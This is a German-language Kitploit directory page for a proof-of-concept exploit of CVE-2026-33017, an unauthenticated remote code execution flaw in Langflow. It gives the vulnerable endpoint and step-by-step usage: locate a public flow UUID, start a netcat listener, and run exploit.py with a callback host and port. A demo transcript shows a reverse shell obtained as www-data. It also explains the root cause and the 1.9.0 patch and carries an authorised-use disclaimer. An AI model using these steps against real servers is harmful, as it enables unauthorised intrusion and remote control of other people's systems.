Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-33017 — PoC-Exploit für CVE-2026-33017: nicht authentifizierte Remote-Codeausführung in Langflow über die Injektion einer bösartigen benutzerdefinierten Python-Komponente, mit integriertem Reverse-Shell-Listener. | Kitploit
Tools/GitHubGitHub/dynamo2k1/cve-2026-33017
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubdynamo2k1/cve-2026-33017

CVE-2026-33017

PoC-Exploit für CVE-2026-33017: nicht authentifizierte Remote-Codeausführung in Langflow über die Injektion einer bösartigen benutzerdefinierten Python-Komponente, mit integriertem Reverse-Shell-Listener.

Repository anzeigen
vor 28 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-33017 — Langflow Nicht authentifizierte Remote-Codeausführung

Autor: dynamo2k1
Schweregrad: Kritisch
CVSSv3: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)


Übersicht

CVE-2026-33017 ist eine kritische, nicht authentifizierte Remote-Codeausführungs-Schwachstelle in Langflow, einer Open-Source-Plattform zur visuellen Erstellung von LLM-Anwendungen und KI-Workflows.

Der anfällige Endpunkt build_public_tmp akzeptiert ohne Authentifizierung ein vom Angreifer bereitgestelltes data-Feld im Anforderungstext. Dadurch kann ein Angreifer eine vollständig benutzerdefinierte Flow-Definition einschleusen, die eine bösartige Python Custom Component enthält, deren Code während des Build-Prozesses auf dem Server ausgeführt wird.

Es sind keine Anmeldeinformationen erforderlich. Es wird nur eine gültige Public-Flow-UUID benötigt.


Betroffene Versionen

StatusVersion
AnfälligLangflow < 1.9.0
BehobenLangflow 1.9.0+

Anfälliger Endpunkt

root@kitploit:~
POST /api/v1/build_public_tmp/{flow_id}/flow

Dieser Endpunkt ist dafür vorgesehen, Public- (gemeinsame) Flows ohne Authentifizierung zu erstellen. In anfälligen Versionen akzeptiert er außerdem ein vom Angreifer kontrolliertes data-Feld im Anforderungstext, das direkt an die serverseitige Build-Logik übergeben wird — einschließlich eingebettetem Python-Code in Custom Components.


Verwendung

Voraussetzungen

root@kitploit:~
pip install requests urllib3

Schritt 1 — Eine Public-Flow-UUID finden

Durchsuchen Sie die Ziel-Langflow-Instanz und suchen Sie nach einem gemeinsamen/öffentlichen Flow. Die UUID erscheint in der URL:

root@kitploit:~
https://target.com/playground/7d84d636-af65-42e4-ac38-26e867052c25
                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                                        this is the flow-id

Schritt 2 — Einen Listener einrichten

root@kitploit:~
nc -lvnp 9001

Schritt 3 — Den Exploit ausführen

root@kitploit:~
python exploit.py \
  --url https://target.com \
  --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 \
  --lhost <YOUR_IP> \
  --lport 9001

Oder verwenden Sie den integrierten interaktiven Listener (kein separates nc erforderlich):

root@kitploit:~
python exploit.py \
  --url https://target.com \
  --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 \
  --lhost <YOUR_IP> \
  --lport 9001 \
  --listen

Optionen


Demo

root@kitploit:~
[*] Target: https://target.com/api/v1/build_public_tmp/<flow-id>/flow
[*] Callback: 10.10.15.28:9001
[*] HTTP 200
[!] SHELL ESTABLISHED FROM 10.x.x.x:36522

www-data@target:/var/lib/langflow$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Funktionsweise

  1. Der Angreifer identifiziert eine öffentliche Langflow-Flow-UUID (in der Playground-URL sichtbar).
  2. Eine manipulierte POST-Anfrage schleust eine bösartige Custom Component ein, die Python-Code auf Modulebene enthält.
  3. Während der Build-Phase kompiliert Langflow den Komponentencode — die Payload des Angreifers wird ausgeführt, bevor irgendeine Methode aufgerufen wird.
  4. Der Code startet eine Reverse-Shell zurück zum Listener des Angreifers.

Grundursache: build_public_tmp vertraute dem data-Feld aus dem Anforderungstext, anstatt ausschließlich die serverseitig gespeicherte Flow-Definition zu verwenden.

Patch: In Langflow 1.9.0 wurde der Parameter data aus build_public_tmp entfernt. Über diesen Endpunkt können keine externen Flow-Definitionen mehr eingeschleust werden.

Patch-Commit: 73b6612


Referenzen

  • GitHub Security Advisory — GHSA-vwmf-pq79-vjvx
  • NVD — CVE-2026-33017
  • Patch-Commit

Haftungsausschluss

Dieses PoC wird ausschließlich zu Bildungs- und autorisierten Sicherheitsforschungszwecken bereitgestellt. Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für deren Tests Sie eine ausdrückliche schriftliche Genehmigung haben.

Tool herunterladen
FlagBeschreibung
--urlBasis-URL des Ziel-Langflow-Servers
--flow-idÖffentliche Flow-UUID
--lhostIhre IP-Adresse für den Reverse-Shell-Callback
--lportIhr Listener-Port
--listenDen integrierten Shell-Handler anstelle von externem nc verwenden
--timeoutHTTP-Request-Timeout in Sekunden (Standard: 30)